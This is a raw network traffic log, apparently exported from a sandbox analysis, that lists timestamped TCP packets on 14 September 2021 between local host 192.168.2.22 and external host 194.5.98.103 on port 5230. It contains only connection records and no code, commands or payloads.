                                  Sep 14, 2021 21:49:10.804503918 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.804722071 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.804924011 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.804969072 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.804971933 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.804975986 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.804986954 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805020094 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805022001 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805114031 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805341005 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805382967 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805392027 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805576086 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805696011 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805712938 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.805735111 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805742979 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.805759907 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.806035995 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.806067944 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.806091070 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.806122065 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.806421995 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.806452990 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.806691885 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.806727886 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.806816101 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.806845903 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807250023 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807286024 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807288885 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807317972 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807535887 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807662964 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807696104 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807809114 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807841063 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807851076 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.807928085 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.807957888 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808049917 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808078051 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808209896 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808238983 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808288097 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808315992 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808540106 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808574915 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808607101 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808635950 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808778048 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808809996 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808855057 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.808886051 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.808970928 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809072971 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809103012 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809251070 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809273005 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809282064 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809410095 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809489965 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809570074 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809600115 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809691906 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809720039 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809936047 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809966087 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.809967041 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.809994936 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810050964 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810076952 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810172081 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810414076 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810442924 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810529947 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810551882 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810561895 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810650110 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810678005 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810811996 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810841084 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.810925961 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.810955048 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811038971 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811067104 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811163902 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811194897 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811412096 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811443090 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811651945 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811685085 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811719894 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811753035 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811909914 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811944962 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.811949015 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.811980009 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812060118 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812091112 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812179089 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812213898 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812500954 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812517881 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812565088 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812568903 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812616110 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812694073 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812715054 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812787056 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812872887 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.812906981 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.812972069 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813004971 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.813900948 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813918114 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813934088 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813950062 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813961029 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.813965082 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813966036 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.813983917 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.813990116 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.814006090 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.814008951 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.814017057 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.840461016 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.840492964 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.840519905 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.840549946 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.846218109 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.846246004 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.846249104 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.846251011 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.954452038 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.954561949 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.954597950 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.954618931 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.954684019 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.954756975 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.954763889 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.954768896 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.962690115 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.962740898 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.962771893 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.962963104 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.962985039 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.962991953 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963005066 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963047028 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963129997 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963159084 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963181973 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963219881 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963255882 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963323116 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963329077 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963372946 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963412046 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963438988 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963454008 CEST523049175194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:10.963469982 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963476896 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:10.963763952 CEST491755230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:14.899020910 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.055465937 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:15.055615902 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.056943893 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.228887081 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:15.228957891 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.436666965 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:15.436774969 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.595140934 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:15.595254898 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:15.805066109 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:15.806020975 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.013124943 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.013219118 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.020284891 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.020399094 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.020453930 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.020457983 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.020512104 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.021975994 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.177467108 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.177522898 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.177562952 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.177593946 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.177628994 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.177709103 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.178404093 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.178443909 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.178482056 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.178495884 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.178540945 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.178555965 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.333906889 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.333956003 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.334194899 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.342520952 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342551947 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342571974 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342596054 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342619896 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342647076 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.342686892 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.342729092 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.344150066 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344168901 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344185114 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344237089 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.344274998 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344366074 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344384909 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.344388008 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.344460011 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.490056992 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490103006 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490134001 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490164995 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490288973 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.490297079 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490428925 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.490508080 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499144077 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499233961 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499275923 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499314070 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499314070 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499361038 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499365091 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499432087 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499469995 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499509096 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499536991 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499550104 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499591112 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499599934 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499763966 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499828100 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.499854088 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.499998093 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500056028 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.500201941 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500241995 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500297070 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.500377893 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500420094 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500473976 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.500585079 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500653028 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500691891 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500725031 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.500730038 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500770092 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500819921 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.500885963 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500929117 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.500988007 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.646476984 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.646501064 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.646526098 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.646541119 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.646558046 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.646578074 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.646610975 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.646682978 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.647362947 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647555113 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647571087 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647586107 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647602081 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647614002 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.647615910 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.647631884 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.647645950 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.650065899 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.655323029 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.657974005 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658152103 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658226967 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658252001 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.658370972 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658421993 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658492088 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.658533096 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658595085 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658725023 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658776999 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.658854961 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658915043 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658981085 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.658997059 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659032106 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659049034 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659065008 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659079075 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659106016 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659110069 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659138918 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659153938 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659183025 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659187078 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659200907 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659218073 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659240007 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659255028 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659259081 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659276009 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659291029 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659300089 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659307003 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659322977 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659337997 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659347057 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659353018 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659368038 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.659392118 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.659459114 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660027981 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660064936 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660079956 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660094976 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660110950 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660126925 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.660151005 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.660178900 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.660182953 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.802794933 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.802839041 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.802869081 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.802897930 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.802898884 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.802923918 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.802927971 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.802974939 CEST491765230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:16.803368092 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.803400993 CEST523049176194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:16.803452015 CEST491765230192.168.2.22194.5.98.103
